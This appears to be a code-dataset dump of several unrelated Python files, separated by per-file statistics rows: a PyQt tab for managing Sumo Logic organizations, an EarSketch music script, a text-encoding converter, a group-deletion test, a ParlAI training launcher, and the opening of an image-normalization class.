            self.lineEditContinuousTierIngest.setText(str(self.org_details['subscription']['baselines']['continuousIngest']))
            self.lineEditContinuousTierStorage.setText(str(self.org_details['subscription']['baselines']['continuousStorage']))
            self.lineEditFrequentTierIngest.setText(str(self.org_details['subscription']['baselines']['frequentIngest']))
            self.lineEditFrequentTierStorage.setText(str(self.org_details['subscription']['baselines']['frequentStorage']))
            self.lineEditInFrequentTierIngest.setText(str(self.org_details['subscription']['baselines']['infrequentIngest']))
            self.lineEditInFrequentTierStorage.setText(str(self.org_details['subscription']['baselines']['infrequentStorage']))
            self.lineEditCSEIngest.setText(str(self.org_details['subscription']['baselines']['cseIngest']))
            self.lineEditCSEStorage.setText(str(self.org_details['subscription']['baselines']['cseStorage']))
            self.lineEditMetrics.setText(str(self.org_details['subscription']['baselines']['metrics']))
        else:
            # Create mode: all baselines start at zero.
            self.lineEditContinuousTierIngest.setText('0')
            self.lineEditContinuousTierStorage.setText('0')
            self.lineEditFrequentTierIngest.setText('0')
            self.lineEditFrequentTierStorage.setText('0')
            self.lineEditInFrequentTierIngest.setText('0')
            self.lineEditInFrequentTierStorage.setText('0')
            self.lineEditMetrics.setText('0')
            self.lineEditCSEIngest.setText('0')
            self.lineEditCSEStorage.setText('0')
        self.layout.addLayout(self.layoutContinuousTierIngest)
        self.layout.addLayout(self.layoutContinuousTierStorage)
        self.layout.addLayout(self.layoutFrequentTierIngest)
        self.layout.addLayout(self.layoutFrequentTierStorage)
        self.layout.addLayout(self.layoutInFrequentTierIngest)
        self.layout.addLayout(self.layoutInFrequentTierStorage)
        self.layout.addLayout(self.layoutMetrics)
        self.layout.addLayout(self.layoutCSEIngest)
        self.layout.addLayout(self.layoutCSEStorage)
        self.createPresetCheckbox = QtWidgets.QCheckBox("Create Credential Preset")
        self.createPresetCheckbox.setChecked(True)
        self.writeCredsToFileCheckbox = QtWidgets.QCheckBox("Write Credentials to File")
        self.writeCredsToFileCheckbox.setChecked(False)
        if not self.org_details:
            # Credential options only make sense when creating a new org.
            self.layoutCheckboxes = QtWidgets.QHBoxLayout()
            self.layoutCheckboxes.addWidget(self.createPresetCheckbox)
            self.layoutCheckboxes.addWidget(self.writeCredsToFileCheckbox)
            self.layout.addLayout(self.layoutCheckboxes)
        self.layout.addWidget(self.buttonBox)
        self.setLayout(self.layout)
        return

    def getresults(self):
        """Collect the form's current values into the dict shape expected by
        the org create/update API calls."""
        results = {'organizationName': str(self.lineEditOrgName.text()),
                   'firstName': str(self.lineEditFirstName.text()),
                   'lastName': str(self.lineEditLastName.text()),
                   'email': str(self.lineEditEmail.text()),
                   'deploymentId': str(self.comboBoxDeployment.currentText()),
                   'baselines': {}
                   }
        results['baselines']['continuousIngest'] = str(self.lineEditContinuousTierIngest.text())
        results['baselines']['continuousStorage'] = str(self.lineEditContinuousTierStorage.text())
        results['baselines']['frequentIngest'] = str(self.lineEditFrequentTierIngest.text())
        results['baselines']['frequentStorage'] = str(self.lineEditFrequentTierStorage.text())
        results['baselines']['infrequentIngest'] = str(self.lineEditInFrequentTierIngest.text())
        results['baselines']['infrequentStorage'] = str(self.lineEditInFrequentTierStorage.text())
        # NOTE(review): metrics lacks the str() wrapper the other fields have;
        # harmless since text() already returns str, but inconsistent.
        results['baselines']['metrics'] = self.lineEditMetrics.text()
        results['baselines']['cseIngest'] = str(self.lineEditCSEIngest.text())
        results['baselines']['cseStorage'] = str(self.lineEditCSEStorage.text())
        if self.comboBoxLicenseType.currentText() == 'Trial':
            results['trialPlanPeriod'] = str(self.lineEditTrialLength.text())
        if not self.org_details:
            results['create_preset'] = self.createPresetCheckbox.isChecked()
            results['write_creds_to_file'] = self.writeCredsToFileCheckbox.isChecked()
        return results
class organizations_tab(QtWidgets.QWidget):
def __init__(self, mainwindow):
    """Load the tab's .ui file and wire the org-management buttons to the
    credentials currently entered on the main window's left side."""
    super(organizations_tab, self).__init__()
    self.mainwindow = mainwindow
    self.tab_name = 'Organizations'
    self.cred_usage = 'left'
    collector_ui = os.path.join(self.mainwindow.basedir, 'data/organizations.ui')
    uic.loadUi(collector_ui, self)
    #self.font = "Waree"
    #self.font_size = 12
    # UI Buttons for Organizations API tab
    # Credentials are read at click time (inside the lambdas), so edits on
    # the main window take effect without re-creating the tab.
    self.pushButtonGetOrgs.clicked.connect(lambda: self.update_org_list(
        str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
        str(self.mainwindow.lineEditUserNameLeft.text()),
        str(self.mainwindow.lineEditPasswordLeft.text()),
    ))
    self.pushButtonCreateOrg.clicked.connect(lambda: self.create_org(
        str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
        str(self.mainwindow.lineEditUserNameLeft.text()),
        str(self.mainwindow.lineEditPasswordLeft.text()),
    ))
    self.pushButtonCancelSubscription.clicked.connect(lambda: self.cancel_subscription(
        self.tableWidgetOrgs.selectedItems(),
        str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
        str(self.mainwindow.lineEditUserNameLeft.text()),
        str(self.mainwindow.lineEditPasswordLeft.text())
    ))
    self.pushButtonUpdateSubscription.clicked.connect(lambda: self.update_subscription(
        self.tableWidgetOrgs.selectedItems(),
        str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
        str(self.mainwindow.lineEditUserNameLeft.text()),
        str(self.mainwindow.lineEditPasswordLeft.text())
    ))
    self.tableWidgetOrgs.itemDoubleClicked.connect(self.row_doubleclicked)
def row_doubleclicked(self, qtablewidgetitem):
    """Slot for itemDoubleClicked on the orgs table.

    NOTE(review): builds row_dict from the selected row but never uses or
    returns it — looks like an unfinished feature; confirm intent.
    """
    selected = self.tableWidgetOrgs.selectedItems()
    row_dict = self.create_dict_from_qtable_row(selected)
def create_dict_from_qtable_row(self, list_of_qtableitems):
    """Map the selected cells of one table row to {column header: cell text}."""
    header_item = self.tableWidgetOrgs.horizontalHeaderItem
    return {
        header_item(cell.column()).text(): cell.text()
        for cell in list_of_qtableitems
    }
def reset_stateful_objects(self, side='both'):
    """Clear the org table and re-enable the tab's controls, then probe the
    Orgs API with the current left-side credentials; if the probe fails,
    disable all controls so the user cannot issue doomed requests.

    Parameters
    ----------
    side : str
        Kept for interface compatibility with the other tabs' reset
        methods; this tab only uses the left-side credentials.
    """
    self.tableWidgetOrgs.clearContents()
    self.tableWidgetOrgs.raw_orgs = []
    self.tableWidgetOrgs.horizontalHeader().hide()
    self.tableWidgetOrgs.setRowCount(0)
    parent_deployment = str(self.mainwindow.comboBoxRegionLeft.currentText().lower())
    cred_id = str(self.mainwindow.lineEditUserNameLeft.text())
    cred_key = str(self.mainwindow.lineEditPasswordLeft.text())
    self.pushButtonGetOrgs.setEnabled(True)
    self.checkBoxShowActive.setEnabled(True)
    self.pushButtonCreateOrg.setEnabled(True)
    self.pushButtonUpdateSubscription.setEnabled(True)
    self.pushButtonCancelSubscription.setEnabled(True)
    try:
        sumo_mam = SumoLogic_Orgs(cred_id, cred_key, parent_deployment, log_level=self.mainwindow.log_level)
        # Connectivity/permission probe; the returned value is not needed.
        sumo_mam.get_deployments()
    except Exception as e:
        # Was a bare `except:` which also swallowed KeyboardInterrupt/SystemExit;
        # narrowed to Exception and logged for troubleshooting.
        logger.debug("[Organizations] org API probe failed, disabling controls: %s", e)
        self.pushButtonGetOrgs.setEnabled(False)
        self.checkBoxShowActive.setEnabled(False)
        self.pushButtonCreateOrg.setEnabled(False)
        self.pushButtonUpdateSubscription.setEnabled(False)
        self.pushButtonCancelSubscription.setEnabled(False)
def update_org_list(self, parent_deployment, id, key):
    """Fetch the org list from the Orgs API and refresh the table widget.

    On any failure, shows an error box and resets the tab's state.
    """
    logger.info("[Organizations] Getting Updated Org List")
    status_filter = "Active" if self.checkBoxShowActive.isChecked() else "All"
    try:
        sumo_mam = SumoLogic_Orgs(id, key, parent_deployment, log_level=self.mainwindow.log_level)
        self.tableWidgetOrgs.raw_orgs = sumo_mam.get_orgs_sync(status_filter=status_filter)
        self.update_org_table_widget()
    except Exception as e:
        logger.exception(e)
        self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
        self.reset_stateful_objects('left')
        return
def update_org_table_widget(self):
    """Rebuild tableWidgetOrgs from the raw org records stored by
    update_org_list(); shows an error box when there is nothing to show.
    """
    logger.info("[Organizations] Updating Org Table Widget")
    self.tableWidgetOrgs.clear()
    orgs = []
    # Flatten each nested API payload into one display row per org.
    for raw_org in self.tableWidgetOrgs.raw_orgs:
        org = {'Org Name': raw_org['organizationName'],
               'Org ID': raw_org['orgId'],
               'Owner Email': raw_org['email'],
               'Credits': raw_org['subscription']['credits'],
               'License': raw_org['subscription']['plan']['planName'],
               'Status': raw_org['subscription']['status'],
               'Continuous Ingest': raw_org['subscription']['baselines']['continuousIngest'],
               'Continuous Storage': raw_org['subscription']['baselines']['continuousStorage'],
               'Frequent Ingest': raw_org['subscription']['baselines']['frequentIngest'],
               'Frequent Storage': raw_org['subscription']['baselines']['frequentStorage'],
               'Infrequent Ingest': raw_org['subscription']['baselines']['infrequentIngest'],
               'Infrequent Storage': raw_org['subscription']['baselines']['infrequentStorage'],
               'CSE Ingest': raw_org['subscription']['baselines']['cseIngest'],
               'CSE Storage': raw_org['subscription']['baselines']['cseStorage'],
               'Metrics': raw_org['subscription']['baselines']['metrics']
               }
        orgs.append(org)
    if len(orgs) > 0:
        numrows = len(orgs)
        self.tableWidgetOrgs.setRowCount(numrows)
        numcolumns = len(orgs[0])
        self.tableWidgetOrgs.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
        self.tableWidgetOrgs.setColumnCount(numcolumns)
        self.tableWidgetOrgs.horizontalHeader().show()
        # Column headers come from the row dict keys (insertion order).
        self.tableWidgetOrgs.setHorizontalHeaderLabels((list(orgs[0].keys())))
        for row in range(numrows):
            for column in range(numcolumns):
                entry = (list(orgs[row].values())[column])
                item = QtWidgets.QTableWidgetItem()
                # setData with DisplayRole stores the typed value (presumably so
                # numeric columns sort/display as numbers — confirm).
                item.setData(QtCore.Qt.DisplayRole, entry)
                self.tableWidgetOrgs.setItem(row, column, item)
    else:
        self.mainwindow.errorbox('No orgs to display.')
def create_org(self, parent_deployment, id, key):
    """Prompt for new-org details via CreateOrUpdateOrgDialog and create the
    org through the Orgs API; refreshes the table on success.
    """
    logger.info("[Organizations]Creating Org")
    try:
        sumo_orgs = SumoLogic_Orgs(id, key, parent_deployment, log_level=self.mainwindow.log_level)
        deployments = sumo_orgs.get_deployments()
        org_info = sumo_orgs.get_parent_org_info()
        trials_enabled = org_info['isEligibleForTrialOrgs']
    except Exception as e:
        self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
        logger.exception(e)
        return
    dialog = CreateOrUpdateOrgDialog(deployments, trials_enabled=trials_enabled)
    # NOTE(review): exec() blocks until the dialog closes, so the show()
    # that follows looks redundant — confirm before removing.
    dialog.exec()
    dialog.show()
    if str(dialog.result()) == '1':  # '1' == dialog accepted
        org_details = dialog.getresults()
        try:
            response = sumo_orgs.create_org(org_details)
            dialog.close()
        except Exception as e:
            self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
            logger.exception(e)
            dialog.close()
            return
        # if org_details['create_preset']:
        #     self.mainwindow.create_preset_non_interactive(response_dict['organizationName'],
        #                                                   response_dict['deploymentId'],
        #                                                   response_dict['accessKey']['id'],
        #                                                   response_dict['accessKey']['key']
        #                                                   )
        # if org_details['write_creds_to_file']:
        #     savepath = QtWidgets.QFileDialog.getExistingDirectory(self, 'Save Credentials Location')
        #     file = pathlib.Path(savepath + r'/' + str(response_dict['organizationName'] + r'.user.json'))
        #     try:
        #         with open(str(file), 'w') as filepointer:
        #             json.dump(response_dict, filepointer)
        #
        #     except Exception as e:
        #         self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
        #         logger.exception(e)
        #     # secure the credentials file
        #     os.chmod(file, 600)
        self.update_org_list(parent_deployment, id, key)
    else:
        return
def cancel_subscription(self, selected_row, parent_deployment, id, key):
    """Deactivate the org selected in the table, then refresh the org list.

    Shows an error box when nothing is selected or when the API call fails.
    """
    if not selected_row:
        self.mainwindow.errorbox('Nothing Selected')
        return
    logger.info("[Organizations] Canceling Subscription")
    row_dict = self.create_dict_from_qtable_row(selected_row)
    try:
        sumo_orgs = SumoLogic_Orgs(id, key, parent_deployment=parent_deployment)
        sumo_orgs.deactivate_org(row_dict['Org ID'])
    except Exception as e:
        self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
        logger.exception(e)
        return
    self.update_org_list(parent_deployment, id, key)
    return
def update_subscription(self, selected_row, parent_deployment, id, key):
    """Edit the subscription baselines of the org selected in the table.

    Opens CreateOrUpdateOrgDialog pre-populated with the org's current
    details; on accept, submits the updated baselines and refreshes the
    list.

    Fixes: return after a failed update_org call instead of falling
    through and refreshing as if it had succeeded (also removes the
    duplicate dialog.close() on that path), and report 'Nothing Selected'
    like cancel_subscription does instead of silently doing nothing.
    """
    if len(selected_row) > 0:
        logger.info("[Organizations] Updating Subscription")
        row_dict = self.create_dict_from_qtable_row(selected_row)
        try:
            sumo_orgs = SumoLogic_Orgs(id, key, parent_deployment)
            org_details = sumo_orgs.get_org_details(row_dict['Org ID'])
            deployments = sumo_orgs.get_deployments()
            org_info = sumo_orgs.get_parent_org_info()
            trials_enabled = org_info['isEligibleForTrialOrgs']
        except Exception as e:
            self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
            logger.exception(e)
            return
        dialog = CreateOrUpdateOrgDialog(deployments, org_details=org_details, trials_enabled=trials_enabled)
        dialog.exec()
        dialog.show()
        if str(dialog.result()) == '1':  # '1' == dialog accepted
            org_update_details = dialog.getresults()
            try:
                response = sumo_orgs.update_org(org_details['orgId'], org_update_details['baselines'])
            except Exception as e:
                self.mainwindow.errorbox('Something went wrong:\n\n' + str(e))
                logger.exception(e)
                dialog.close()
                return
            dialog.close()
            self.update_org_list(parent_deployment, id, key)
    else:
        self.mainwindow.errorbox('Nothing Selected')
| 48.247723
| 127
| 0.669435
| 2,310
| 26,488
| 7.572727
| 0.149784
| 0.015206
| 0.015206
| 0.022352
| 0.213743
| 0.186875
| 0.181387
| 0.152232
| 0.134625
| 0.126965
| 0
| 0.004849
| 0.229198
| 26,488
| 548
| 128
| 48.335766
| 0.851937
| 0.042623
| 0
| 0.201422
| 0
| 0
| 0.100122
| 0.005132
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028436
| false
| 0.011848
| 0.014218
| 0
| 0.07109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759a0430a9251f3f49f413680d321c1b741036a9
| 562
|
py
|
Python
|
hello.py
|
Sid672/Music
|
ee3c35ae1dfa71372dc6ce5a101503beaac91fd5
|
[
"MIT"
] | null | null | null |
hello.py
|
Sid672/Music
|
ee3c35ae1dfa71372dc6ce5a101503beaac91fd5
|
[
"MIT"
] | null | null | null |
hello.py
|
Sid672/Music
|
ee3c35ae1dfa71372dc6ce5a101503beaac91fd5
|
[
"MIT"
] | null | null | null |
# Code
# EarSketch composition script
# script_name: hello
#
# author: Siddharth
# description: composition
#
# Set up: pull in the EarSketch API (init, fitMedia, setEffect, ...).
from earsketch import *
# Initialize the project and set the tempo to 120 BPM.
init()
setTempo(120)
# Variables: sound-library clips used in the piece.
chord = RD_UK_HOUSE__5THCHORD_2
secondarybeat = HIPHOP_BASSSUB_001
mainbeat = HOUSE_MAIN_BEAT_003
# Music: place clips on tracks 1-3 and shape them with effects.
fitMedia(chord, 1, 1, 16)
setEffect(1, VOLUME, GAIN, -60, 1, 5, 12)   # fade track 1 in from -60 dB to +5 dB over measures 1-12
setEffect(1, VOLUME, GAIN, 5, 12, -60, 16)  # then fade it back out over measures 12-16
fitMedia(secondarybeat, 2, 1, 12)
setEffect(2, DELAY, DELAY_TIME, 500)        # 500 ms delay on the bass track
fitMedia(mainbeat, 3, 1, 8)
setEffect(2, REVERB, REVERB_TIME, 200)      # NOTE(review): reverb is applied to track 2, not the main beat on track 3 — confirm intent
# Finish the composition.
finish()
| 17.030303
| 42
| 0.709964
| 81
| 562
| 4.765432
| 0.62963
| 0.051813
| 0.082902
| 0.103627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09636
| 0.169039
| 562
| 33
| 43
| 17.030303
| 0.730193
| 0.233096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759a621d0c21d47983881f0990e0d95c9d89af8b
| 575
|
py
|
Python
|
utf8_to_sjis.py
|
yo16/utf8_to_sjis
|
a0ea7205a2acb96743ca8cb24c38cf1db2cb0ffb
|
[
"MIT"
] | null | null | null |
utf8_to_sjis.py
|
yo16/utf8_to_sjis
|
a0ea7205a2acb96743ca8cb24c38cf1db2cb0ffb
|
[
"MIT"
] | null | null | null |
utf8_to_sjis.py
|
yo16/utf8_to_sjis
|
a0ea7205a2acb96743ca8cb24c38cf1db2cb0ffb
|
[
"MIT"
] | null | null | null |
import codecs
import os

# Custom error handler 'none': substitute '?' for any character that
# cannot be represented in the target encoding instead of raising.
codecs.register_error('none', lambda e: ('?', e.end))


def utf8_to_sjis(files, in_dir, out_dir):
    """Re-encode every named file from UTF-8 (in in_dir) to Shift-JIS (in out_dir).

    Creates out_dir if it does not already exist.
    """
    os.makedirs(out_dir, exist_ok=True)
    for name in files:
        utf8_to_sjis_one(name, in_dir, out_dir)


def utf8_to_sjis_one(file, in_dir, out_dir):
    """Re-encode a single file; unencodable characters become '?'."""
    src = f'{in_dir}/{file}'
    dst = f'{out_dir}/{file}'
    with open(src, mode='r', encoding='utf-8') as reader, \
            open(dst, mode='w', encoding='sjis', errors='none') as writer:
        writer.write(reader.read())


if __name__ == '__main__':
    utf8_to_sjis(['test_file.csv'], 'in_utf8', 'sjis')
| 19.166667
| 81
| 0.673043
| 104
| 575
| 3.384615
| 0.423077
| 0.119318
| 0.113636
| 0.125
| 0.147727
| 0.147727
| 0.147727
| 0.147727
| 0
| 0
| 0
| 0.01227
| 0.149565
| 575
| 29
| 82
| 19.827586
| 0.707566
| 0
| 0
| 0
| 0
| 0
| 0.144852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759ce6e746deead9ce63c2abe9211efd40789622
| 904
|
py
|
Python
|
tests/test_group_deletion.py
|
igoldin74/python_for_testers
|
c992f85f7b08487e79c4c45ab86e0fdeb2c47b20
|
[
"Apache-2.0"
] | null | null | null |
tests/test_group_deletion.py
|
igoldin74/python_for_testers
|
c992f85f7b08487e79c4c45ab86e0fdeb2c47b20
|
[
"Apache-2.0"
] | null | null | null |
tests/test_group_deletion.py
|
igoldin74/python_for_testers
|
c992f85f7b08487e79c4c45ab86e0fdeb2c47b20
|
[
"Apache-2.0"
] | null | null | null |
import random

from model.group import Group


def test_group_removal(app, db, check_ui):
    """Delete one random group and verify the DB (and optionally the UI) agree.

    Fix: ensure at least one group exists BEFORE sampling — the original
    called random.choice() on a possibly empty list (IndexError) and only
    created the fallback group afterwards, too late and against a stale
    snapshot of the list.
    """
    if len(db.get_group_list()) == 0:
        app.group.create(Group(name="test_group_random_name", header="random_header", footer="random_footer"))
    old_group_list = db.get_group_list()
    group = random.choice(old_group_list)
    app.group.delete_group_by_id(group.id)
    assert app.group.count() == len(old_group_list) - 1
    new_group_list = db.get_group_list()
    old_group_list.remove(group)
    assert old_group_list == new_group_list
    if check_ui:  # this will execute when "--check_ui" run option is added
        def clean(group):  # this func removes spaces from group names
            return Group(id=group.id, name=group.name.strip())
        db_list = map(clean, new_group_list)
        assert sorted(db_list, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
| 45.2
| 110
| 0.713496
| 145
| 904
| 4.151724
| 0.351724
| 0.179402
| 0.099668
| 0.069767
| 0.139535
| 0.139535
| 0
| 0
| 0
| 0
| 0
| 0.002677
| 0.173673
| 904
| 19
| 111
| 47.578947
| 0.803213
| 0.107301
| 0
| 0
| 0
| 0
| 0.059701
| 0.027363
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.117647
| false
| 0
| 0.117647
| 0.058824
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759d23943bc7a51dc76aa89f5a85cc113775bdad
| 1,946
|
py
|
Python
|
projects/wizard_of_wikipedia_ko/generator/train_end2end.py
|
kimsan0622/anonymous_kowow
|
25f55add8e657b2186dfdedca3e5035b567b235e
|
[
"MIT"
] | 2
|
2021-09-06T16:58:53.000Z
|
2022-01-14T04:17:48.000Z
|
projects/wizard_of_wikipedia_ko/generator/train_end2end.py
|
kimsan0622/anonymous_kowow
|
25f55add8e657b2186dfdedca3e5035b567b235e
|
[
"MIT"
] | null | null | null |
projects/wizard_of_wikipedia_ko/generator/train_end2end.py
|
kimsan0622/anonymous_kowow
|
25f55add8e657b2186dfdedca3e5035b567b235e
|
[
"MIT"
] | 1
|
2022-01-14T09:01:41.000Z
|
2022-01-14T09:01:41.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

# Train the Korean Wizard-of-Wikipedia end-to-end generator with a KE-T5
# backbone, using ParlAI's standard training loop with project defaults
# baked in below (all overridable from the command line).
from parlai.scripts.train_model import setup_args, TrainLoop

if __name__ == '__main__':
    parser = setup_args()
    parser.set_defaults(
        # Task / model selection.
        task='wizard_of_wikipedia_ko:generator:train',
        model='projects.wizard_of_wikipedia_ko.generator.t5:T5EndToEndAgent',
        model_file='/tmp/end2end_generator/model',
        t5_model_arch='pretrained_model/t5.1.1.base.gin_ke.ke_v100_span_corruption_600K',
        text_truncate=256,
        ln='ko',
        # Logging / validation cadence.
        log_every_n_secs=10,
        validation_patience=12,
        validation_metric='ppl',
        validation_metric_mode='min',
        validation_every_n_epochs=0.5,
        # Knowledge-selection settings.
        truncate=256,
        max_knowledge=32,
        knowledge_alpha=0.95,
        knowledge_truncate=64,
        # Optimization.
        learningrate=5e-4,
        warmup_updates=5000,
        clip=0.1,
        lr_scheduler='invsqrt',
        embedding_type='fasttext',
        # Decoding / batching.
        beam_size=1,
        skip_generation=False,
        batchsize=64,
    )
    TrainLoop(parser.parse_args()).train()

# Example invocations kept for reference:
# parlai train_model -m projects.wizard_of_wikipedia_ko.generator.t5:T5EndToEndAgent -mf model/ke-t5_test -t wizard_of_wikipedia_ko:generator:random_split --ln en -bs 4 -eps 1 -lr 1e-5 --num-epochs 1 --optimizer adam --t5-model-arch pretrained_model/t5.1.1.base.gin_ke.ke_v100_span_corruption_600K --text_truncate 512
# parlai train_model -t wizard_of_wikipedia_ko:generator:random_split --ln ke_mix -m projects.wizard_of_wikipedia_ko.generator.t5:T5EndToEndAgent -mf model/ke-t5_test --t5-model-arch ../pretrained_model/t5.1.1.base.gin_ke.ke_v100_span_corruption_600K --log-every-n-secs 10 --validation-patience 12 --validation-metric ppl --validation-metric-mode min --validation-every-n-epochs 0.5 -bs 4 --max_knowledge 32 --num-epochs 1
| 48.65
| 424
| 0.722508
| 286
| 1,946
| 4.632867
| 0.426573
| 0.036226
| 0.076981
| 0.086038
| 0.541887
| 0.520755
| 0.520755
| 0.520755
| 0.480755
| 0.417358
| 0
| 0.054523
| 0.170606
| 1,946
| 40
| 424
| 48.65
| 0.766419
| 0.476876
| 0
| 0
| 0
| 0
| 0.218379
| 0.187747
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759dbd8419466a5b58d9ed3efce98d055fc109cf
| 37,914
|
py
|
Python
|
notebooks/__code/normalization/normalization_with_simplify_selection.py
|
mabrahamdevops/python_notebooks
|
6d5e7383b60cc7fd476f6e85ab93e239c9c32330
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/__code/normalization/normalization_with_simplify_selection.py
|
mabrahamdevops/python_notebooks
|
6d5e7383b60cc7fd476f6e85ab93e239c9c32330
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/__code/normalization/normalization_with_simplify_selection.py
|
mabrahamdevops/python_notebooks
|
6d5e7383b60cc7fd476f6e85ab93e239c9c32330
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import collections
import numpy as np
from ipywidgets import widgets
from IPython.core.display import display, HTML
import logging
from NeuNorm.normalization import Normalization
from __code import file_handler
from __code.ipywe import myfileselector
from __code.normalization.get import Get
from __code.normalization.metadata_handler import MetadataHandler, MetadataName, METADATA_KEYS
from __code.normalization import utilities
JSON_DEBUGGING = False
MAX_DF_COUNTS_ALLOWED = 900
METADATA_ERROR_ALLOWED = 1
LIST_METADATA_NOT_INSTRUMENT_RELATED = ['filename', 'time_stamp', 'time_stamp_user_format']
class NormalizationWithSimplifySelection:
    """Notebook workflow that matches sample images with their open-beam (OB)
    and dark-field (DF) counterparts using image metadata, grouping files by
    acquisition (exposure) time and instrument configuration."""

    working_dir = ''

    def __init__(self, working_dir=''):
        """Initialize empty state dictionaries and configure session logging.

        Parameters
        ----------
        working_dir : str
            Root folder of the experiment; OB and DF images are
            auto-discovered under raw/ob and raw/df relative to it.
        """
        self.working_dir = working_dir
        self.list_of_images = []
        self.input_data_folder = []
        # Per-file metadata, keyed by file index; numeric keys are raw
        # metadata tag ids:
        # {0: {65027: 55.0,
        #      65028: 59.2,
        #      65029: 1.0,
        #      'filename': 'full_filename',
        #      'time_stamp': 1454544.34545,
        #      'time_stamp_user_format': '2019-11-19 02:48:47'},
        #  ...,
        # }
        self.sample_metadata_dict = {}
        self.ob_metadata_dict = {}
        self.df_metadata_dict = {}
        # key of dictionary being the acquisition time
        # {50: {'config0': {'list_sample': [self.sample_metadata_dict[0],
        #                                   self.sample_metadata_dict[1],..],
        #                   'list_ob': [self.ob_metadata_dict[0],
        #                               self.ob_metadata_dict[1],
        #                               ...],
        #                   'list_df': [file1, file2, file3],
        #                   'metadata_infos': {},
        #                   'first_images': {'sample': {},
        #                                    'ob': {},
        #                                    'df': {}},
        #                   'last_images': {'sample': {},
        #                                   'ob': {},
        #                                   'df': {}},
        #                   'time_range_s_selected': {'before': np.NaN,
        #                                             'after': np.NaN},
        #                   'time_range_s': {'before': np.NaN,
        #                                    'after': np.NaN},
        #                   },
        #      'config1': {...},
        #      },
        #  30: {...},
        # }
        self.final_full_master_dict = {}
        # same as the final_full_master_dict but in this one, the OB outside the time range
        # defined as excluded
        self.final_with_time_range_master_dict = {}
        # One log file per session, name supplied by the project's Get helper.
        o_get = Get(parent=self)
        log_file_name = o_get.log_file_name()
        logging.basicConfig(filename=log_file_name,
                            filemode='w',
                            format='[%(levelname)s] - %(asctime)s - %(message)s',
                            level=logging.INFO)  # logging.INFO, logging.DEBUG
        logging.info("*** Starting new session ***")
def select_sample_folder(self):
    """Open a folder picker for the images to normalize; once a folder is
    chosen, control passes to retrieve_sample_metadata_from_sample_folder."""
    folder_sample_widget = myfileselector.MyFileSelectorPanel(instruction='select folder of images to normalize',
                                                              start_dir=self.working_dir,
                                                              next=self.retrieve_sample_metadata_from_sample_folder,
                                                              type='directory',
                                                              multiple=False)
    folder_sample_widget.show()
def retrieve_sample_metadata_from_sample_folder(self, sample_folder):
    """Callback run after the user picks the sample folder: list its images
    (files of the most dominant extension) and, if any qualify, start the
    metadata/matching pipeline; otherwise show an inline error."""
    logging.info(f"select sample folder: {sample_folder}")
    [list_of_images, _] = file_handler.retrieve_list_of_most_dominant_extension_from_folder(folder=sample_folder)
    can_we_continue = self.images_files_found_in_list(list_of_images)
    if can_we_continue:
        logging.info(f"-> number of images found: {len(list_of_images)}")
        self.retrieve_sample_metadata(list_of_images)
    else:
        logging.info(f"-> No images found!")
        display(HTML('<span style="font-size: 20px; color:Red">No images found in the folder selected!</span>'))
def images_files_found_in_list(self, list_of_images):
    """Return True if at least one TIFF or FITS file name is in the list.

    Fix: use endswith rather than substring matching so names that merely
    contain '.tif' somewhere (e.g. 'my.tiffany.txt') are not treated as
    images.
    """
    return any(_file.endswith(('.tiff', '.tif', '.fits')) for _file in list_of_images)
def retrieve_sample_metadata(self, list_of_images):
    """Extract metadata for every sample image, then run the rest of the
